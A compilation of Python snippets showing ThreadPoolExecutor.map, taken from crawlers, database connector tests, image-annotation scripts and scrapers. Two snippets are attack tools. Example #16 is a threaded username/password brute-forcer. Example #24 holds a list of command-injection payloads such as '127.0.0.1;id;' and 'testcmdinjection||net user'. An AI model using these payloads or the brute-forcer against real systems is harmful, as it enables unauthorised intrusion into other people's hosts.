Code example #1
    def run(cls, dir_path: str):
        # root directory under which the crawled files are stored
        spiders_root_path = app.config.get('DATA_ROOT_PATH')
        executor = ThreadPoolExecutor(max_workers=16)
        if dir_path:
            files_path = spiders_root_path + '/{}/files'.format(dir_path)
            gov = Government.query.filter_by(dir_path=dir_path).first()

            queue = []
            # iterate over the dataset folders under the given open-platform directory
            for dataset_name in os.listdir(files_path):
                # cls.handel_dataset((files_path, dataset_name, gov.id))
                queue.append((files_path, dataset_name, gov.id))
                if len(queue) == 16:
                    executor.map(cls.handel_dataset, queue)
                    queue = []
            if queue:
                # submit the remaining partial batch
                executor.map(cls.handel_dataset, queue)
        else:
            for spider_name in os.listdir(spiders_root_path):
                files_path = spiders_root_path + '/{}/files'.format(
                    spider_name)
                gov = Government.query.filter_by(dir_path=spider_name).first()

                queue = []
                # iterate over the dataset folders under this open-platform directory
                for dataset_name in os.listdir(files_path):
                    # cls.handel_dataset((files_path, dataset_name, gov.id))
                    queue.append((files_path, dataset_name, gov.id))
                    if len(queue) == 16:
                        executor.map(cls.handel_dataset, queue)
                        queue = []
                if queue:
                    executor.map(cls.handel_dataset, queue)
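Since executor.map submits one task per element of the iterable it is given, the 16-item batching above is optional; a shorter sketch of the same idea, reusing the snippet's own handel_dataset and variables, would be:

tasks = [(files_path, dataset_name, gov.id)
         for dataset_name in os.listdir(files_path)]
# max_workers=16 already caps concurrency, so no manual batching is needed;
# iterating over the map() result also surfaces any exceptions raised in the workers.
for _ in executor.map(cls.handel_dataset, tasks):
    pass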
Code example #2
def stream_multiple_processes(processes: List[Tuple[str, subprocess.Popen]]):
    colours = [rgb_to_logger_rgb(c) for c in get_n_colours(len(processes))]
    processes_to_stream = [
        ProcessToStream(process_name, process, colour)
        for (process_name, process), colour in zip(processes, colours)
    ]
    executor = ThreadPoolExecutor(max_workers=len(processes))
    executor.map(stream_process_output, processes_to_stream)
Code example #3
def mat_vec(A: List[List[int]], x: List[int]) -> List[int]:
    N = len(A)
    y = [0] * N
    f = partial(calc, A=A, x=x, y=y)

    pool = ThreadPoolExecutor(max_workers=2)
    pool.map(f, range(N))
    pool.shutdown(True)

    return y
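The calc helper is not included in the snippet above; a plausible stand-in, assuming it is meant to compute one row of the matrix-vector product into the shared list y, might look like this (hypothetical, for illustration only):

def calc(i, A, x, y):
    # hypothetical helper: write row i of the product A @ x into the shared output list y
    y[i] = sum(a_ij * x_j for a_ij, x_j in zip(A[i], x))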
Code example #4
def _test_snow5871(conn_cnx,
                   db_parameters,
                   number_of_threads=10,
                   rt_max_outgoing_rate=60,
                   rt_max_burst_size=1,
                   rt_max_borrowing_limt=1000,
                   rt_reset_period=10000):
    """SNOW-5871: rate limiting for creation of non-recycable objects."""
    logger.debug(('number_of_threads = %s, rt_max_outgoing_rate = %s, '
                  'rt_max_burst_size = %s, rt_max_borrowing_limt = %s, '
                  'rt_reset_period = %s'), number_of_threads,
                 rt_max_outgoing_rate, rt_max_burst_size,
                 rt_max_borrowing_limt, rt_reset_period)
    with conn_cnx(user=db_parameters['sf_user'],
                  password=db_parameters['sf_password'],
                  account=db_parameters['sf_account']) as cnx:
        cnx.cursor().execute("""
alter system set
    RT_MAX_OUTGOING_RATE={},
    RT_MAX_BURST_SIZE={},
    RT_MAX_BORROWING_LIMIT={},
    RT_RESET_PERIOD={}""".format(rt_max_outgoing_rate, rt_max_burst_size,
                                 rt_max_borrowing_limt, rt_reset_period))

    try:
        with conn_cnx() as cnx:
            cnx.cursor().execute("create or replace database {name}_db".format(
                name=db_parameters['name']))
            meta = []
            for i in range(number_of_threads):
                meta.append({
                    'idx': str(i + 1),
                    'cnx': cnx,
                    'name': db_parameters['name'] + 'tbl_5871_' + str(i + 1),
                })
            pool = ThreadPoolExecutor(number_of_threads)
            results = list(pool.map(_create_a_table, meta))
            success = 0
            for r in results:
                success += 1 if r['success'] else 0

            # at least one should succeed
            assert success >= 1, 'at least one query should succeed'
    finally:
        with conn_cnx() as cnx:
            cnx.cursor().execute("drop database if exists {name}_db".format(
                name=db_parameters['name']))

        with conn_cnx(user=db_parameters['sf_user'],
                      password=db_parameters['sf_password'],
                      account=db_parameters['sf_account']) as cnx:
            cnx.cursor().execute("""
alter system set
    RT_MAX_OUTGOING_RATE=default,
    RT_MAX_BURST_SIZE=default,
    RT_RESET_PERIOD=default,
    RT_MAX_BORROWING_LIMIT=default""")
Code example #5
def indexResults(reslist, annopath=""):
    # fall back to the default test annotation file when no path is supplied
    if not annopath:
        annopath = "/root/data/gvision/dataset/raw_data/image_annos/person_bbox_test.json"
    # print('Loading test annotation json file: {}'.format(annopath))
    with open(annopath, 'r') as load_f:
        anno = json.load(load_f)
    # print("bboxex_num",len(reslist))#498
    indexedresults = defaultdict(list)
    # if test:
    #     tempannos={}
    #     imgfilters=imgfilters
    #     if imgfilters:
    #     # imgfilters=["15_24"]
    #         for imgfilter in imgfilters:
    #             tempannos.update({i:j for i,j in anno.items() if imgfilter in i })
    #         anno=tempannos
    def say(iss):
        filename, annodict=iss[0],iss[1]
        imageid = annodict['image id']
        for resdict in reslist:
            resimageid = resdict['image_id']
            if resimageid == imageid:
                indexedresults[imageid].append(resdict)
        return indexedresults
    executor = ThreadPoolExecutor(max_workers=10)
    func_var = [[file_name,dict_value] for file_name,dict_value in anno.items()]
    pbar = tqdm(total=len(anno), ncols=50)
    for temp in executor.map(say,func_var):
        indexedresults.update(temp)
        pbar.update(1)
    pbar.close()
    results = indexedresults
    print("index bbox to self image")
    return results 
Code example #6
def check_key_storage_free_keys_concurrency(key_storage):
    """Parallel tests to check the thread-safety of the storage regarding "free keys" booking."""
    key_type1 = "mytype1"
    key_type2 = "mytype2"

    for i in range(77):
        for key_type in (key_type1, key_type2):
            key_storage.add_free_keypair(key_type=key_type, public_key=b"whatever1", private_key=b"whatever2")

    def retrieve_free_keypair_for_index(idx, key_type):
        keychain_uid = uuid.UUID(int=idx)
        try:
            key_storage.attach_free_keypair_to_uuid(keychain_uid=keychain_uid, key_type=key_type)
            time.sleep(0.001)
            public_key_content = key_storage.get_public_key(keychain_uid=keychain_uid, key_type=key_type)
            assert public_key_content == b"whatever1"
            res = True
        except KeyDoesNotExist:
            res = False
        return res

    executor = ThreadPoolExecutor(max_workers=20)

    for key_type in (key_type1, key_type2):
        results_gen = executor.map(functools.partial(retrieve_free_keypair_for_index, key_type=key_type), range(200))
        results = list(results_gen)
        assert results.count(True) == 77
        assert results.count(False) == 123

    assert key_storage.get_free_keypairs_count(key_type=key_type1) == 0
    assert key_storage.get_free_keypairs_count(key_type=key_type2) == 0
    return locals()
Code example #7
def test_race_in_success_callback(
    fixtures: CommonFixtures,
    callbacks: Callbacks,
    transactional_db,
):
    """
    Выполняет много депозитов в 100 тредов.
    Проверяет что нет состояния гонки в
    пополнениях/списаниях баланса
    """

    pool = ThreadPoolExecutor(10)

    tasks = [random.randrange(1, 100, 1) for _ in range(100)]
    total_amount = sum(tasks)
    old_value = fixtures.wallet_rub.balance

    @transaction.atomic()
    def work(amount):
        tr = TransactionFactory(
            wallet=fixtures.wallet_rub,
            status=TransactionStatus.PROCESSING,
            amount=amount,
            type=TransactionTypes.DEPOSIT,
        )
        callbacks.success(tr)

    list(pool.map(work, tasks))
    fixtures.wallet_rub.refresh_from_db()
    assert fixtures.wallet_rub.balance == old_value + total_amount
Code example #8
    def _multiprocessing_badges(self, multiprocess: bool = True) -> None:
        """
        Get the badges using single or multi processing.
        :type multiprocess: bool
        :param multiprocess: If it's true then use multiprocessing other wise use a single processor.
        :rtype: None
        :return: None
        """
        from concurrent.futures.thread import ThreadPoolExecutor
        from time import time
        if multiprocess is False:
            for url in self._urls:
                self._badges_id += self._request_urls(url)
        else:
            init_time = time()
            processors = self._max_workers
            if processors:
                number_of_urls = len(self._urls)
                if number_of_urls <= 0:
                    processors = None
                elif number_of_urls < processors:
                    processors = number_of_urls

            executor = ThreadPoolExecutor(processors)
            pages_with_badges = executor.map(self._request_urls, self._urls)

            difference = int(time() - init_time)
            print('# -------------------------------------------')
            print('# Execution time: ', difference)
            print('# -------------------------------------------')
            for badges_id in pages_with_badges:
                self._badges_id += badges_id
        self._number_of_badges = len(self._badges_id)
Code example #9
    def _upload_files_in_parallel(self, file_metas):
        """Uploads files in parallel.

        Args:
            file_metas: List of metadata for files to be uploaded.
        """
        idx = 0
        len_file_metas = len(file_metas)
        while idx < len_file_metas:
            end_of_idx = min(idx + self._parallel, len_file_metas)

            logger.debug('uploading files idx: {}/{}'.format(
                idx + 1, end_of_idx))

            target_meta = file_metas[idx:end_of_idx]
            while True:
                pool = ThreadPoolExecutor(len(target_meta))
                results = list(
                    pool.map(SnowflakeFileTransferAgent.upload_one_file,
                             target_meta))
                pool.shutdown()

                # need renew AWS token?
                retry_meta = []
                for result_meta in results:
                    if result_meta['result_status'] in [
                            ResultStatus.RENEW_TOKEN,
                            ResultStatus.RENEW_PRESIGNED_URL
                    ]:
                        retry_meta.append(result_meta)
                    else:
                        self._results.append(result_meta)

                if len(retry_meta) == 0:
                    # no new AWS token is required
                    break
                if any([
                        result_meta['result_status'] ==
                        ResultStatus.RENEW_TOKEN for result_meta in results
                ]):
                    client = self.renew_expired_client()
                    for result_meta in retry_meta:
                        result_meta['client'] = client
                    if end_of_idx < len_file_metas:
                        for idx0 in range(idx + self._parallel,
                                          len_file_metas):
                            file_metas[idx0]['client'] = client
                if any([
                        result_meta['result_status'] ==
                        ResultStatus.RENEW_PRESIGNED_URL
                        for result_meta in results
                ]):
                    self._update_file_metas_with_presigned_url()
                target_meta = retry_meta

            if end_of_idx == len_file_metas:
                break
            idx += self._parallel
Code example #10
File: novel.py Project: GitLeftZhou/learnPython
    def concurrent_spider(self, novel_name, bgn_idx, max_workers):
        """
        Fetch chapters concurrently.
        :param novel_name: file name
        :param bgn_idx: index of the first chapter to fetch
        :param max_workers: degree of parallelism
        :return:
        """
        try:
            filename = novel_name + ".txt"
            path = "files/"
            if not os.path.isdir(path):
                os.mkdir(path)
            # initialise the thread pool
            executor = ThreadPoolExecutor(max_workers=max_workers)
            with open(path + filename, 'w', encoding='utf-8') as f:
                f.write(str(novel_name) + self.menu_url + '\n')  # write the novel name and a newline
                # executor.map preserves input order, so chapters are written in sequence
                for content in executor.map(self.__get_content,
                                            range(bgn_idx, len(self.urls)),
                                            self.urls[bgn_idx:]):
                    f.write(content + '\r\n')  # append the chapter content and a line break

        except Exception as ex:
            print("Exception while saving the novel", ex)
            return False
        return True
Code example #11
class CssDownloader(object):
    def __init__(self):
        self.css_start_token = None
        self.css_end_token = None
        self._executor = ThreadPoolExecutor(4)
        self._results = []

    def fetch_css_files(self, base_url, css_start_token, css_end_token, urls):
        #  type: (Text, Text, Text, List[Text]) -> None
        if not is_absolute_url(base_url):
            logger.info("Base URL is not an absolute URL!")
        assert self.css_start_token is None or self.css_start_token == css_start_token
        assert self.css_end_token is None or self.css_end_token == css_end_token
        self.css_start_token = css_start_token
        self.css_end_token = css_end_token
        nodes = [CssNode.create(base_url, url) for url in urls]
        futures = self._executor.map(_download_jsonify_node,
                                     urls,
                                     nodes,
                                     timeout=CSS_DOWNLOAD_TIMEOUT)
        self._results.append(futures)

    def results(self):
        # type: () -> Dict[Text, Text]
        return {url: data for url, data in chain(*self._results)}

    def __enter__(self):
        self._executor.__enter__()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        return self._executor.__exit__(exc_type, exc_val, exc_tb)
Code example #12
def model_fusion(outpath,outfile):
    resultsa1,resultsa2,resultsa3,resultsa4=results_resolve(model_path="/root/data/gvision/my_merge/finalsubmission/fafafinal/det_results.json",weight=1)
    resultsb1,resultsb2,resultsb3,resultsb4=results_resolve(model_path="/root/data/gvision/my_merge/finalsubmission/final2/all.json",weight=0.6)
    annopath="/root/data/gvision/dataset/raw_data/image_annos/person_bbox_test.json"
    # for i in zip(list(resulta1,resulta2,resulta3,resulta4),list(resultb1,resultb2,resultb3,resultb4)):
    results1=resultsa1+resultsb1
    results2=resultsa2+resultsb2
    results3=resultsa3+resultsb3
    results4=resultsa4+resultsb4
    print('Loading split annotation json file: {}'.format(annopath))
    with open(annopath, 'r') as load_f:
        srcanno = json.load(load_f)
    indexedresults=indexResults(results1,anno=srcanno)
    mergedresults = defaultdict(list)
    for (filename, objlist) in indexedresults.items():
        # print("filename",filename)
        # print("srcfile, paras",srcfile, paras )
        srcfile = filename.replace('_IMG', '/IMG')#02_Xili_Crossroad_IMG_02_01___0.5__0__0.jpg
        srcimageid = srcanno[srcfile]['image id']
        for objdict in objlist:
            mergedresults[srcimageid].append([objdict['bbox'][0],objdict['bbox'][1],objdict['bbox'][2],objdict['bbox'][3],objdict['score'], objdict['category_id']])
    for (imageid, objlist) in mergedresults.items():
        print(imageid,objlist)
        # masxlist=[i[2]*i[3] for i in objlist]
        # max_wh=np.max(masxlist)
        # objlist=[[i[0],i[1],i[2],i[3],i[4]*0.05+i[3]*i[2]*0.95/max_wh,i[5],i[6]] for i in objlist ]
        keep = py_cpu_nms(np.array(objlist),0.5)
        outdets = []
        for index in keep:
            outdets.append(objlist[index])
        mergedresults[imageid] = outdets
    savelist = []
    def say2(iss):
        imageid, objlist=iss[0],iss[1]
        # print(imageid, objlist)
        templist=[]
        for obj in objlist:#obj [22528, 1270, 24576, 1, 1.0, 4]
            # print(obj)
            templist.append({
                "image_id": imageid,
                "category_id": obj[5],
                "bbox": obj[:4],
                # "bbox": tlbr2tlwh(obj[:4]),
                "score": obj[4]
            })
        return templist
    executor = ThreadPoolExecutor(max_workers=80)
    func_var = [[file_name,dict_value] for file_name,dict_value in mergedresults.items()]

    print("fusion bbox into self'image start ")
    pbar2= tqdm(total=len(mergedresults), ncols=50)
    for temp in executor.map(say2,func_var):
        savelist+=temp
        pbar2.update(1)
    pbar2.close()
    with open(os.path.join(outpath, outfile), 'w') as f:
        dict_str = json.dumps(savelist, indent=2)
        f.write(dict_str)
        print(f"save ***results*** json :{os.path.join(outpath, outfile)}")
Code example #13
def thread_task(args):
    items = []
    start, end = args[0], args[1] + 1
    executor = ThreadPoolExecutor(max_workers=4)
    for item in executor.map(bd_spider.fetch_one, list(range(start, end))):
        if item is not None:
            items.append(item)
    return items
Code example #14
File: test_search.py Project: lyfb/search_images
def test_search_by_thread_pool():
    search_paths = get_search_paths()
    pool = ThreadPoolExecutor(max_workers=12)
    start = time.time()
    result = list(pool.map(count_right_by_path, search_paths))
    end = time.time()
    print(sum(result) / 100)  # vgg16 accuracy 0.99
    print('multithreaded -- elapsed: {:.3f}'.format(end - start))  # vgg16 83.691
Code example #15
def checkAllIpsByMultiThreading(fileName):
    from util import FileUtil
    ips = FileUtil.readIPsFromFile(fileName)
    executor = ThreadPoolExecutor(NO_OF_PROCESS)
    results = executor.map(getIPPingStatus, ips)
    dataList = list(results)
    for i in dataList:
        print(i)
Code example #16
def main(addr, headers):
    usernames = read_file(os.path.join(BASE_DIR, 'user.txt'))
    passwords = read_file(os.path.join(BASE_DIR, 'password.txt'))
    datas = itertools.product([addr], usernames, passwords, [headers])

    executor = ThreadPoolExecutor(max_workers=WORKERS)
    for success, username, password in executor.map(brute_force, datas):
        if success:
            print('+', username, password)
Code example #17
def test_concurrent_insert(conn_cnx, db_parameters):
    """Concurrent insert tests. Inserts block on the one that's running."""
    number_of_threads = 22  # change this to increase the concurrency
    expected_success_runs = number_of_threads - 1
    cnx_array = []

    try:
        with conn_cnx() as cnx:
            cnx.cursor().execute("""
create or replace warehouse {}
warehouse_type=standard
warehouse_size=small
""".format(db_parameters['name_wh']))
            sql = """
create or replace table {name} (c1 integer, c2 string)
""".format(name=db_parameters['name'])
            cnx.cursor().execute(sql)
            for i in range(number_of_threads):
                cnx_array.append({
                    'host': db_parameters['host'],
                    'port': db_parameters['port'],
                    'user': db_parameters['user'],
                    'password': db_parameters['password'],
                    'account': db_parameters['account'],
                    'database': db_parameters['database'],
                    'schema': db_parameters['schema'],
                    'table': db_parameters['name'],
                    'idx': str(i),
                    'warehouse': db_parameters['name_wh']
                })

            pool = ThreadPoolExecutor(number_of_threads)
            results = list(pool.map(
                _concurrent_insert,
                cnx_array))
            pool.shutdown()
            success = 0
            for record in results:
                success += 1 if record['success'] else 0

            # 21 threads or more should succeed
            assert success >= expected_success_runs, "number of successful runs"

            c = cnx.cursor()
            sql = "select * from {name} order by 1".format(
                name=db_parameters['name'])
            c.execute(sql)
            for rec in c:
                logger.debug(rec)
            c.close()

    finally:
        with conn_cnx() as cnx:
            cnx.cursor().execute(
                "drop table if exists {}".format(db_parameters['name']))
            cnx.cursor().execute(
                "drop warehouse if exists {}".format(db_parameters['name_wh']))
Code example #18
File: scraper.py Project: novucs/papertool
def scrape_google(paper: str, executor: ThreadPoolExecutor):
    urls = list(googlesearch.search(f'"bibtex" {paper}', stop=10))
    all_references = []
    all_dois = []

    for references, dois in executor.map(scrape_web_page, urls):
        all_references.extend(references)
        all_dois.extend(dois)

    return all_references, all_dois
Code example #19
File: scraper.py Project: novucs/papertool
def scrape_paper(paper: str, executor: ThreadPoolExecutor):
    if '/' in paper and paper.endswith('.pdf'):
        # Attempt to download and parse a pdf and its title from a potential url
        try:
            response = requests.get(paper, stream=True)
            pdf = tika.parser.from_buffer(response.raw)
            lines = pdf['content'].strip().splitlines()
            seen_caps = False
            for line, _ in zip(reversed(lines[:PDF_TITLE_CHECK_DEPTH]),
                               range(PDF_TITLE_CHECK_DEPTH)):
                if not line.strip():
                    continue
                if line.isupper():
                    seen_caps = True
                    paper = line
                if not seen_caps:
                    paper = line
        except IOError:
            pass

    # Search arxiv
    searchable_paper_name = re.sub(r'[^a-zA-Z0-9\s]+', ' ', paper).lower()
    result = next(
        iter(arxiv.query(f'ti:"{searchable_paper_name}"', max_results=1)),
        None)
    references = []

    if result:
        authors = join_authors(result['authors'])
        year = result['published_parsed'].tm_year
        title = result['title']
        journal = 'arXiv Preprint'
        volume, issue = result['id'].split('/')[-1].split('v')
        pages = None
        accessed = datetime.now().strftime('[Accessed %d %B %y]')
        url = result['pdf_url']
        references.append(
            JournalReference(authors, year, title, journal, volume, issue,
                             pages, accessed, url, JournalType.ELECTRONIC))

        # Search doi if exists
        doi = result['doi']
        if doi:
            reference = scrape_doi(doi)
            if reference:
                references.append(reference)

    # Search google
    google_references, google_dois = scrape_google(paper, executor)
    references.extend(google_references)

    # Search all DOIs found from Google
    references.extend(executor.map(scrape_doi, google_dois))

    return sorted_references(list(filter(None, set(references))), paper)
Code example #20
    def indexResults(self):
        print('Loading result json file: {}'.format(self.respath))
        with open(self.respath, 'r') as load_f:
            reslist = json.load(load_f)
        print("bboxex_num", len(reslist))  #498
        print('Loading split annotation json file: {}'.format(
            self.splitannopath))
        with open(self.splitannopath, 'r') as load_f:
            splitanno = json.load(load_f)
        indexedresults = defaultdict(list)
        if self.test:
            tempannos = {}
            imgfilters = self.imgfilters
            # imgfilters=["15_24"]
            for imgfilter in imgfilters:
                tempannos.update(
                    {i: j
                     for i, j in splitanno.items() if imgfilter in i})
            splitanno = tempannos

        def say(iss):
            filename, annodict = iss[0], iss[1]
            imageid = annodict['image id']
            # print("imageid",imageid)
            for resdict in reslist:
                resimageid = resdict['image_id']
                if resimageid == imageid:
                    # print("1111",resdict) {'image_id': 253, 'category_id': 1, 'bbox': [981.3349609375, 322.8221435546875, 22.030517578125, 32.01666259765625], 'score': 0.16039377450942993}
                    # print("2222",resimageid)
                    # print("1111",type(resdict))
                    # print("2222",type(resimageid))
                    indexedresults[filename].append(resdict)

            return indexedresults

        # print("splitanno",splitanno)
        executor = ThreadPoolExecutor(max_workers=1)
        func_var = [[file_name, dict_value]
                    for file_name, dict_value in splitanno.items()]
        pbar = tqdm(total=len(splitanno), ncols=50)
        for temp in executor.map(say, func_var):
            # print(temp)
            indexedresults.update(temp)
            pbar.update(1)
        pbar.close()
        self.results = indexedresults
        np.save(
            f"/root/data/gvision/CrowdDet-master/model/rcnn_emd_refine/outputs/coco_results/{self.npyname}.npy",
            indexedresults)
        print(
            "save ***index.npy*** as :",
            f"/root/data/gvision/CrowdDet-master/model/rcnn_emd_refine/outputs/coco_results/{self.npyname}.npy"
        )
Code example #21
def test_concurrent_insert_using_connection(conn_cnx, db_parameters):
    """
    Concurrent insert tests using the same connection
    """
    try:
        with conn_cnx() as cnx:
            cnx.cursor().execute("""
create or replace warehouse {}
warehouse_type=standard
warehouse_size=small
""".format(db_parameters['name_wh']))
            cnx.cursor().execute("""
CREATE OR REPLACE TABLE {name} (c1 INTEGER, c2 STRING)
""".format(name=db_parameters['name']))
            number_of_threads = 5
            metas = []
            for i in range(number_of_threads):
                metas.append({
                    'connection': cnx,
                    'idx': i,
                    'name': db_parameters['name'],
                })
            pool = ThreadPoolExecutor(number_of_threads)
            pool.map(_concurrent_insert_using_connection, metas)
            pool.shutdown()
            cnt = 0
            for _ in cnx.cursor().execute(
                    "SELECT * FROM {name} ORDER BY 1".format(
                        name=db_parameters['name'])):
                cnt += 1
            assert cnt <= number_of_threads, \
                "Number of records should be at most the number of threads"
            assert cnt > 0, \
                "Number of records should be at least one"
    finally:
        with conn_cnx() as cnx:
            cnx.cursor().execute("drop table if exists {}".format(
                db_parameters['name']))
            cnx.cursor().execute("drop warehouse if exists {}".format(
                db_parameters['name_wh']))
Code example #22
    def load_config(self, conf_path):
        if not os.path.isdir(conf_path):
            self._logger.error('Applications not configured in %s', conf_path)
            conf_path = os.path.join('/etc', 'huey.multitenant.conf')

        if not os.path.isdir(conf_path):
            self._logger.error('Applications not configured in %s', conf_path)
            sys.exit(1)

        all_conf = (conf for conf in os.listdir(conf_path) if conf.endswith('.conf'))

        pool = ThreadPoolExecutor(16)
        instances = pool.map(lambda conf: self._load_instances_from_conf(conf, conf_path), all_conf)
        self.instances = [instance for instance in instances if instance is not None]
        pool.shutdown()
        if len(self.instances) == 0:
            self._logger.error('Check that you have at least one application configured in %s', conf_path)
            sys.exit(1)
Code example #23
    def splitdata(self, scale, imgrequest=None, imgfilters=[]):
        """
        :param scale: resize rate before cut
        :param imgrequest: list, images names you want to request, eg. ['1-HIT_canteen/IMG_1_4.jpg', ...]
        :param imgfilters: essential keywords in image name
        """
        if imgrequest is None or not isinstance(imgrequest, list):
            imgnames = list(self.annos.keys())
        else:
            imgnames = imgrequest

        splitannos = {}
        img_list = []
        for imgname in imgnames:
            iskeep = False
            for imgfilter in imgfilters:
                if imgfilter in imgname:
                    iskeep = True
            if imgfilters and not iskeep:
                continue
            img_list.append(imgname)

        def split_img(imgname):
            splitdict = self.SplitSingle(imgname, scale)
            return splitdict

        executor = ThreadPoolExecutor(max_workers=10)
        for splitdict in executor.map(split_img, img_list):
            # for img in img_list:
            #     splitdict = split_img(img)
            splitannos.update(splitdict)
        # add image id
        imgid = 1
        for imagename in splitannos.keys():
            splitannos[imagename]['image id'] = imgid
            imgid += 1
        # save new annotation for split images
        outdir = os.path.join(self.outannopath, self.outannofile)
        with open(outdir, 'w', encoding=self.code) as f:
            dict_str = json.dumps(splitannos, indent=2)
            f.write(dict_str)
Code example #24
def main(addr, headers):
    payloads = [
        {
            'name': 'id',
            'pattern': r'uid=\d',
            'payloads': [
                '127.0.0.1;id;',
                '127.0.0.1&&id',
                '127.0.0.1&;&id',
                '127.0.0.1&id',
                '127.0.0.1|id',
                'testcmdinjection||id',
                'testcmdinjection|;|id',
                'testcmdinjection|id',
                'testcmdinjection&id',
            ]
        },
        {
            'name': 'netuser',
            'pattern': r'administrator',
            'payloads': [
                'testcmdinjection||net user',
                'testcmdinjection|;|net user',
                'testcmdinjection|net user',
                'testcmdinjection&net user',
                '127.0.0.1&&net user',
                '127.0.0.1&;&net user',  # the original omitted this comma, silently concatenating two payloads
                '127.0.0.1&net user',
                '127.0.0.1|net user',
            ]
        },
    ]
    datas = itertools.product([addr], [headers], payloads)
    executor = ThreadPoolExecutor(max_workers=WORKERS)
    for success, name, payload in executor.map(injection, datas):
        if success:
            print('+ name:', name, ', payload:', payload)
Code example #25
    def test_qinvoke_context_delete(self):
        executor = ThreadPoolExecutor(max_workers=1)
        context = QObject()
        isdeleted = False
        lastindex = -1

        def mark_deleted():
            nonlocal isdeleted
            isdeleted = True

        def delete(qobj: QObject):
            assert qobj.thread() is QThread.currentThread()
            spy = QSignalSpy(qobj.destroyed)
            qobj.deleteLater()
            QCoreApplication.sendPostedEvents(qobj, QEvent.DeferredDelete)
            assert len(spy) == 1

        context.destroyed.connect(mark_deleted)

        def func(i):
            nonlocal isdeleted
            nonlocal lastindex
            lastindex = i
            self.assertFalse(isdeleted)
            self.assertIs(context.thread(), self.app.thread())

        callback = qinvoke(func, context=context)

        _ = executor.map(callback, range(1000))

        while lastindex < 0:
            QTest.qWait(10)
        assert lastindex >= 0
        delete(context)
        assert isdeleted
        lasti = lastindex
        QTest.qWait(50)
        assert lasti == lastindex
        executor.shutdown()
Code example #26
def indexResults(reslist,anno):
    print("bboxex_num",len(reslist))#498
    indexedresults = defaultdict(list)
    # if test:
    #     tempannos={}
    #     imgfilters=imgfilters
    #     if imgfilters:
    #     # imgfilters=["15_24"]
    #         for imgfilter in imgfilters:
    #             tempannos.update({i:j for i,j in anno.items() if imgfilter in i })
    #         anno=tempannos
    def say(iss):
        filename, annodict=iss[0],iss[1]
        imageid = annodict['image id']
        # print("imageid",imageid)
        for resdict in reslist:
            resimageid = resdict['image_id']
            if resimageid == imageid:
                # print("1111",resdict) {'image_id': 253, 'category_id': 1, 'bbox': [981.3349609375, 322.8221435546875, 22.030517578125, 32.01666259765625], 'score': 0.16039377450942993}
                # print("2222",resimageid)
                # print("1111",type(resdict))
                # print("2222",type(resimageid))
                indexedresults[filename].append(resdict)

        return indexedresults
    # print("anno",anno)
    executor = ThreadPoolExecutor(max_workers=1)
    func_var = [[file_name,dict_value] for file_name,dict_value in anno.items()]
    pbar = tqdm(total=len(anno), ncols=50)
    for temp in executor.map(say,func_var):
        # print(temp)
        indexedresults.update(temp)
        pbar.update(1)
    pbar.close()
    results = indexedresults
    return results 
Code example #27
def cal2():
    from concurrent.futures.thread import ThreadPoolExecutor
    pool = ThreadPoolExecutor(max_workers=4)
    result = list(pool.map(gcd, numbers))
    return result
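gcd and numbers are defined elsewhere in the original script; a hypothetical stand-in that would make the snippet runnable, assuming numbers is a list of integer pairs, could be:

from math import gcd as _math_gcd

numbers = [(1963309, 2265973), (2030677, 3814172), (1551645, 2229620)]

def gcd(pair):
    # hypothetical wrapper: unpack an (a, b) pair so it can be mapped over `numbers`
    a, b = pair
    return _math_gcd(a, b)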
Code example #28
print(f'length of read ids is {len(ids)}')

if len(ids) != 0:
    for i in range(0, 1000, 100):
        idsChunk = ids[i:i + 100]
        resultSet = es.mtermvectors(index="trec-news-index",
                                    doc_type="_doc",
                                    body=dict(ids=idsChunk,
                                              parameters=dict(
                                                  term_statistics=True,
                                                  fields=["text"])))['docs']
        print(f'len(resultSet) is {len(resultSet)}')
        #getTermWeights(doc for doc in resultSet)
        proc = ThreadPoolExecutor()
        proc.map(getTermWeights, [doc for doc in resultSet])
        '''
        
        #print(f'fn_result type is {type(fn_result)}')
        #print(f'fn_result here is {fn_result}')
        print(f'actions here is {actions}')
        print(f'actions type here is {type(actions)}')
        list_len = len(actions)
        print(f'length of action {len(actions)}')
        if list_len !=0 and (list_len-previous_count)>=99:
            print(f"length of actions here{len(actions)}")
            indexData(actions=actions)
            print(f'indexed now {len(actions)} and counter value is {counter}')
            actions = []
            previous_count = list_len
        '''
Code example #29
File: execl_config.py Project: lw000/new_python_demo
    people1.address = '广东省深圳市宝安区西乡芬达科技园对面雅居园11单元1202'
    people1.birthday = '19860526'
    people1.IDcardNo = '450332198605264124'
    print(people)
    print(people1)
    
    people2 = copy.deepcopy(people)
    people2.name = '李诗彤'
    people2.age = 5
    people2.sex = 0
    people2.address = '广东省深圳市宝安区西乡芬达科技园对面雅居园11单元1202'
    print(people)
    print(people2)
            
    executor = ThreadPoolExecutor(3)
    result = executor.map(test_func, [4, 7, 1], [4, 7, 1])
    for v in result:
        print(v)
                
    L = fab(10)
    for i, v in enumerate(L):
        print(v)
        
#     for i in range(len(L)-1):
#         print('%d/%d=%.30f' % (L[i], L[i+1], L[i]/L[i+1]))

    print('--------------------------------------------------------------------')

    for v in fab_gen(10):
        print(v)
        
Code example #30
for t in threads:
    add(t.result())
end_time=time.time()
print("the whole process finished in {} seconds".format(end_time-start_time))
print("#####################################first block#############################################")
#####################################first block#############################################

#####################################second block#############################################
print("#####################################second block#############################################")
second_start_time=time.time()
another_bunch_of_threads=[executor.submit(func1,sec) for sec in secs]
futures=concurrent.futures.as_completed(another_bunch_of_threads)
for f in futures:
    add(f.result())
second_end_time=time.time()
print("Second process end in {} seconds".format(second_end_time-second_start_time))
print("#####################################second block#############################################")
#####################################second block#############################################

#####################################third block#############################################
print("#####################################third block#############################################")
third_start_time=time.time()
third_bunch_of_threads=executor.map(func1,secs)
for result in third_bunch_of_threads:
    add(result)
third_end_time=time.time()
print("Third process end in {} seconds".format(third_end_time-third_start_time))
print("#####################################third block#############################################")
#####################################third block#############################################
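The fragment above assumes an executor, a worker func1, a result collector add, and a secs list created earlier in the script; a purely hypothetical setup under which the three timed blocks would run is:

import time
import concurrent.futures
from concurrent.futures import ThreadPoolExecutor

def func1(sec):
    # hypothetical worker: sleep for `sec` seconds and return it
    time.sleep(sec)
    return sec

total = []
def add(value):
    # hypothetical collector shared by all three blocks
    total.append(value)

secs = [3, 2, 1]
executor = ThreadPoolExecutor(max_workers=3)
start_time = time.time()
threads = [executor.submit(func1, sec) for sec in secs]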

Code example #31
File: test_utils.py Project: leeopop/coexecutor
def do_test3(workers):
    param = {"max_workers": workers}
    loop = asyncio.new_event_loop()

    lock = threading.Lock()
    tresult = []
    presult = []
    cresult = []

